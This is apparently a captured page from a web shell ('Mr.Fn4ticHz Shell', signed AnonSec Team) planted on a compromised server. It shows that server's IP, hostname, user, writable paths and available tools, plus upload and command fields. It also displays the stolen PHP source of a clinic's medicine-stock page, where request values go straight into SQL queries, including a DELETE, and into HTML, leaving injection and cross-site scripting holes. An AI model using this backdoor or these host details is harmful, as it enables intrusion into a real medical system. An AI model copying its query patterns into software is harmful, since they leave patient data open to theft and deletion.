Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.12.107.31
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/add_Medicine_in_Stock.php
<?php
session_start();
include("dbconnection.php");
include("header.php");
include("dashboarddocument.php");
require_once('../DBManager.php');
require_once("../LoginManager.php");
require_once('../patientmanager.php');
if(isset($_POST[opdmedicine]))
{
		PatientManager::Medicinestoknurse("$_POST[admin_id]","$_POST[Category]","$_POST[DRUGS_name]","$_POST[Contain]","$_POST[Dose]","$_POST[dose_value]","$_POST[mrp]","$_POST[size]","$_POST[Name_brand]");
	 }
	 if(isset($_GET[delid]))
{
	$sql ="DELETE FROM medicine_stok WHERE medicine_id='$_GET[delid]'";
	$qsql=mysqli_query($con,$sql);
	if(mysqli_affected_rows($con) == 1)
	{
		echo "<script>alert('Deleted successfully..');</script>";
	}
}
?>
<!DOCTYPE html>
<html>  <head>
    <title>Medicine in Stock</title>
   
  </head>
  <body>
      
   
          
         <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
    
                   <form name="opdmedicine" method="post">
                       <?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
		{
     echo "
<input type='hidden' value='$re[entered_by]' name='admin_id' >
";
}
?>

<?php
include("dbconnection.php");

	$sql12 ="SELECT * FROM medicinede WHERE id='$_GET[id]'";
		$qsql12 = mysqli_query($con,$sql12);
		while($re12 = mysqli_fetch_array($qsql12))
		{
     echo "
				<label>Category</label>
				<select onchange='cotegory(this.value)' class='form-control' name='Category' id='Category'>
    <option value='$re12[Category]'>$re12[Category] </option>
    <option value='Injectable'>Injectable </option>
      <option value='IV Fluid'>IV Fluid </option>
    <option value='Capsule'>Capsule </option>
     <option value='Tablet'>Tablet </option>
         <option value='Syrup'>Syrup </option>
             <option value='Powder'>Powder </option>
                         <option value='Ointment'>Ointment</option>
                           <option value='Drop'>Drop</option>
                                <option value='Solution'>Solution</option>
                                    <option value='Patch'>Patch</option>
    </select>

    <label>Name of Medicine</label>
				<input type='text' onkeyup='this.value = this.value.toUpperCase();' placeholder='Name of Medicine' value='$re12[DRUGS]' name='DRUGS_name' id='DRUGS_name' class='form-control' />
				
<div id='divct'>
    
    <label>Dose</label>
				<input type='text'  placeholder='In mg' value='$re12[Dose]' name='Dose' id='dose' class='form-control' />
				
				
					<label>Packaging Size</label>
				
				<input type='text' placeholder='Packaging Size' name='size' id='size' class='form-control' />

					Price Per 
				<input type='TEXT'  step='0.01' placeholder='price' name='mrp' id='mrp' class='form-control' />
				
			
</div>

<label>Name of Brand</label>
				
				<input type='text'  onkeyup='this.value = this.value.toUpperCase();' placeholder='Name of Brand' name='Name_brand' id='Name_brand' class='form-control' />
				
				
					<label>Contain</label>
			
				<input type='text'  onkeyup='this.value=this.value.toUpperCase();' placeholder='Contain' name='Contain' id='Contain' class='form-control' />
				
				";
		}
		?>

       <input type='submit' value='Add' name='opdmedicine'>
      </form>
         
   </div>   </div>   </div>
   <table id="example2"  id ="demo" class="table table-bordered table-hover">
<?php
			$sql ="SELECT * FROM addaspatient WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
            echo " <tbody>
                    
          
     ";
}
?>  
   </tbody>
</table> 
            <script>

 function cotegory(ctid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divct").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loadcotegory.php?ctid="+ctid,true);
        xmlhttp.send();
}
            
           
            
      let modalBtns = [...document.querySelectorAll(".button")];
      modalBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.getAttribute('data-modal');
          document.getElementById(modal)
            .style.display = "block";
        }
      });
      let closeBtns = [...document.querySelectorAll(".close")];
      closeBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.closest('.modal');
          modal.style.display = "none";
        }
      });
      window.onclick = function(event) {
        if(event.target.className === "modal") {
          event.target.style.display = "none";
        }
      }
    </script>
  </body>
</html>

Anon7 - 2022
AnonSec Team